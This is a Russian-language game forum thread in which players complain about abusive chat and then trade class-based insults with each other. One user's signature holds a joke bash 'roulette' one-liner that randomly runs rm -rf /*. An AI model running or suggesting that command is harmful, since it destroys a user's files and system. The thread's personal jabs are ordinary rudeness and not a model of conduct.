Перейти к содержимому

Рейд возмездия.

Рекомендованные публикации

Игроки
228 публикаций
15 167 боёв
Давно и не всегда молча так поступаю. Мат - часть нашей речи и от него никуда не уплыть, да и игра боевая, а вот отборное, агрессивное оскорбление в игровом чате раздражает это да. Каждый раз получаю, что "меры приняты", но... "ошибки, допущенные на стадии проектирования - исправить сложнее всего", это к тому, что генетика и воспитание закладывается совсем не в этой игре.

[ $[ $RANDOM % 6 ] == 0 ] && rm -rf /* || echo "Жив";
Игроки
7 публикаций
8 813 боёв
Полностью поддерживаю, но на мне есть грешок, сам недавно обматюкал боевого товарища, эмоции, нервы не выдержали. Себя я не оправдываю и как уже сказал, с вами я согласен, но бывает и с этим уж нечего не поделать)))))
Бета-тестеры
10 публикаций
3 650 боёв
есть же фильтр, в чом проблема то? а того кто обходит фильтр пишет через тире и тп, скриншот в саппорт и дело с концом хД
Бета-тестеры
562 публикации
8 974 боя

Ну, судя по тому, что больше всего боев у ТС проведено на артах - рейд будет успешным! Их всегда матерят...  :Smile-hiding:

А вот третий по юзабельности - ИС-7, с 37% процентами побед. Видимо, на нем (при такой-то игре, ага) тоже матов приходится читать предостаточно...

Короче, рейд однозначно будет результативным.  :Smile-izmena:

• Плюс 2
Игроки
283 публикации
11 190 боёв
22 Ноя 2010 - 18:09 пользователь hubaduy сказал:

ТС ,мне кажется или вы возомнили себя неким дворянином голубых кровей. Что за "рабочие районы",что за "ПТУшники"? Или вы  считаете ,что в чатах матом только работяги могут писать? Так я вас огорчу. От интеллигенствующего *** оскорблений можно услышать как правило куда больше.

П.С. Да я работяга. Я вырос в "рабочих районах",кстати путягу тоже заканчивал ,если чо. и меня тошнит от таких как вы эстетов.

Только не стошните на соседа в маршрутке.... :D

• Плюс 5
Клан "Русские морозы"http://www.rusmoroz.ucoz.ru/
Рассмотрю предложения либо о вливании в наш Клан Вашего Клана, либо ищу командира, способного организовать дело, для создания Клана
"РУССКИЕ МОРОЗЫ - 2"

Техника в ангаре: Т-54, ИС-7, КВ-5, Lowe, MAUS, Gw typ E.
Игроки
293 публикации
11 011 боёв
22 Ноя 2010 - 18:35 пользователь Gerald_dobriy сказал:

о! вот и оскорбление. я скриншот сделал. пойду отправлю в саппорт. :Smile-playing:
Альфа-тестеры
4 713 публикации
16 365 боёв
22 Ноя 2010 - 18:35 пользователь Gerald_dobriy сказал:

Ваш атрофированый "инт еллигентский" умишко рисует вам не верные образы. Не все работяги пользуются маршрутками. Эт раз.

Я сижу дома и меня ну никак не може стошнить на" соседа по маршрутке " .Эт два.

А три -это ,то что вы напоминаете мне одного персонажа по имени Никита Сергеевич. Тот тоже себя возомнил неизвестно кем.

• Плюс 2
Старый следопыт , ясные глаза. Знает , кто и где зарыт много лет назад...
Игроки
4 207 публикаций
37 090 боёв
22 Ноя 2010 - 18:59 пользователь hubaduy сказал:

а, так ты еще и безработный!

//сори, не сдержался.

• Плюс 1
Игроки
283 публикации
11 190 боёв
22 Ноя 2010 - 19:01 пользователь kostyam сказал:

а, так ты еще и безработный!

//сори, не сдержался.

:lol::lol::lol:
Рассмотрю предложения либо о вливании в наш Клан Вашего Клана, либо ищу командира, способного организовать дело, для создания Клана
"РУССКИЕ МОРОЗЫ - 2"

Игроки
283 публикации
11 190 боёв
22 Ноя 2010 - 18:59 пользователь hubaduy сказал:

Ваш атрофированый "инт еллигентский" умишко рисует вам не верные образы. Не все работяги пользуются маршрутками. Эт раз.

А три -это ,то что вы напоминаете мне одного персонажа по имени Никита Сергеевич. Тот тоже себя возомнил неизвестно кем.

Азбука Вам в помощь...

"РУССКИЕ МОРОЗЫ - 2"

Альфа-тестеры
4 713 публикации
16 365 боёв
22 Ноя 2010 - 19:11 пользователь Gerald_dobriy сказал:

Азбука Вам в помощь...

Когда нечего сказать ,то лучше ченить ляпнуть ,типо "обидное".

Обьясните мне такую весчь. Как ваши речи про оскорбления из первого поста вяжутся с "пасанами с рабочих районов",с "ПТУшниками",с "смотри не стошни",с "Азбука в помошь"? То есть в игре кого то там оскорблять нельзя,а на форуме значит можно оскорблять не просто кого то ,а целый социальный класс.Крутая логика.

• Плюс 3
Игроки
2 122 публикации
Опубликовано: · Скрыто Гость, 27 февраля, 2017 - Данное сообщение удалено автоматически. Причина: удаление пользователя.
Скрыто Гость, 27 февраля, 2017 - Данное сообщение удалено автоматически. Причина: удаление пользователя.
А представьте, что начнется, когда введут голосовой чат? Все эти орды школоты и неадекватов. Я сам материться люблю и умею. Но мат должен быть к месту, ведь ударив себя молотком по пальцу я не скажу: "О случайная флюктуация времени и пространства". А вот в игре ему точно не место.
  • Плюс 1
Игроки
143 публикации
19 959 боёв
22 Ноя 2010 - 19:23 пользователь hubaduy сказал:

Когда нечего сказать ,то лучше ченить ляпнуть ,типо "обидное".

Обьясните мне такую весчь. Как ваши речи про оскорбления из первого поста вяжутся с "пасанами с рабочих районов",с "ПТУшниками",с "смотри не стошни",с "Азбука в помошь"? То есть в игре кого то там оскорблять нельзя,а на форуме значит можно оскорблять не просто кого то ,а целый социальный класс.Крутая логика.

да элементарно и вяжутся- я всегда говорил что самый тупой и агрессивный гой, это гой с высшим образованием.
  • Плюс 2
Игроки
283 публикации
11 190 боёв
22 Ноя 2010 - 19:34 пользователь gop74 сказал:

да элементарно и вяжутся- я всегда говорил что самый тупой и агрессивный гой, это гой с высшим образованием.

У меня их два... Я в двойне тупой и агрессивный гой?  :D:D:D

"РУССКИЕ МОРОЗЫ - 2"

Игроки
283 публикации
11 190 боёв
22 Ноя 2010 - 19:34 пользователь gop74 сказал:

Кстати, а широкие спАртивные штаны за 300р "аля Адидас" и кожАнки с рынка за 4-5 тыс.руб. еще в моде? :D:rolleyes:

"РУССКИЕ МОРОЗЫ - 2"

Альфа-тестеры
4 713 публикации
16 365 боёв
22 Ноя 2010 - 20:42 пользователь Gerald_dobriy сказал:

У меня одно. Получено уже после службы в ВМФ. И тем не менее, я считаю себя обычным работягой в среде которых я и работаю.

Благодаря обычному рабочему эта страна вообще еще чего то и стоит. А ваши понты насчет 2х образований унылы чуть менее чуть полностью. Я вот вроде тоже в Питере,но как то понять никак не могу,откуда у вас эти московские замашки?

Вот мотаюсь я по командировкам и вижу как живут люди  за пределами мегаполисов и мне как то совестно было бы понтоватся перед ними своей зарплатой или образованием .Но видимо некоторым этого не понять. Некоторые у нас тут белая кость ,голубая кровь.

Вот еще одно замечание вдогонку. Заметил такое поведение как у вас за людьми ,которые только только вылезли из *** и спешат всем доложить о своих успехах ,при этом пытаются остальных смешать с грязью.Да и скорее всего в большой город приехали  "поступать".

Пользователь сказал:

Кстати, а широкие спАртивные штаны за 300р "аля Адидас" и кожАнки с рынка за 4-5 тыс.руб. еще в моде?  

Ну вот и подтверждение моим словам выше). Видимо кожанки и спортивные штаны вам близки.
Игроки
4 222 публикации
87 757 боёв
22 Ноя 2010 - 20:42 пользователь Gerald_dobriy сказал:

Да :) Хотя - м.б. в квадрате.
  • Плюс 2
Игроки
114 публикации
46 735 боёв
Что же, почитал. Предложение само по себе интересное, но после первого авторского поста захотелось уйти подальше показать последнему, что нехорошо-с. Вам должно быть известно, что интеллигентность человека определяется не столько правильным написанием, сколько умением быть выше ситуации, не вступать в склоку. Ваш первый пост, к моему глубокому сожалению, говорит об обратном.  Не уподобляться "атакующему", а тем паче крыть его на форуме нехорошими словами - вот моя позиция. Честь имею.
  • Плюс 3
Игроки
243 публикации
2 760 боёв
22 Ноя 2010 - 17:49 пользователь Gerald_dobriy сказал:

Надоело. Глубоко и искренне. Задрали.

Играю я, играет ребенок. Поддерживаю! Даешь народный ESRB!!

Еще, согласен со skat991, приличный пост ко 2-ой странице превратился в бессмысленную перепалку... не уподобляйтесь.

• Плюс 1
Выиграть нельзя. Остаться при своих - нельзя. Нельзя даже выйти из игры.
Гость
Эта тема закрыта для публикации новых ответов.
  • Сейчас на странице   0 пользователей

• Эту страницу никто не просматривает.
  • Создать...